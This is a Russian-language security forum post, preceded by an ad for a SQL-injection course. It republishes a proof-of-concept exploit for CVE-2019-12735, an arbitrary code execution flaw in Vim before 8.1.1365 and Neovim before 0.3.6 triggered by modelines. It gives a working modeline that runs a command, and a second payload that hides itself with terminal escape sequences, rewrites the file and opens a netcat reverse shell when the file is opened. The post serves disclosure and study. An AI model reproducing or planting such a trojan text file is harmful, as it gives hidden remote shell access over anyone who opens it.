• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution или же прячем payload в текстовике

not eth1cal hack3r

Green Team
22.02.2019
13
65
BIT
0
Продукт: Vim < 8.1.1365, Neovim < 0.3.6
Тип: Arbitrary Code Execution
CVE: CVE-2019-12735
Дата: 2019-06-04
Автор: Arminius (@rawsec)

Vim до 8.1.1365 и Neovim до 0.3.6 уязвимы для произвольного выполнения кода через модельные линии, открывая специально созданный текстовый файл


Proof of concept

  • Создать poc.txt:
    Код:
    :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

  • Убедитесь, что параметр modeline не отключен :)set modeline).
  • Открыть фаил в Vim: vim poc.txt

  • Система будет выполнять uname -a.

Proof of concept 2 (reverse shell)

Этот PoC описывает реальный подход атаки, в котором обратная оболочка запускается после того, как пользователь открывает файл. Чтобы скрыть атаку, файл будет немедленно переписан при открытии. Кроме того, PoC использует терминальные escape-последовательности, чтобы скрыть модельную линию при печати содержимого с помощью cat. (cat-v показывает фактическое содержание.)
shell.txt

payload:
Код:
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

Демо эксплуатации уязвимости


30498
 

Вложения

  • 1560078679652.png
    1560078679652.png
    3,3 КБ · Просмотры: 437
  • 1560078791688.png
    1560078791688.png
    3,3 КБ · Просмотры: 400
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!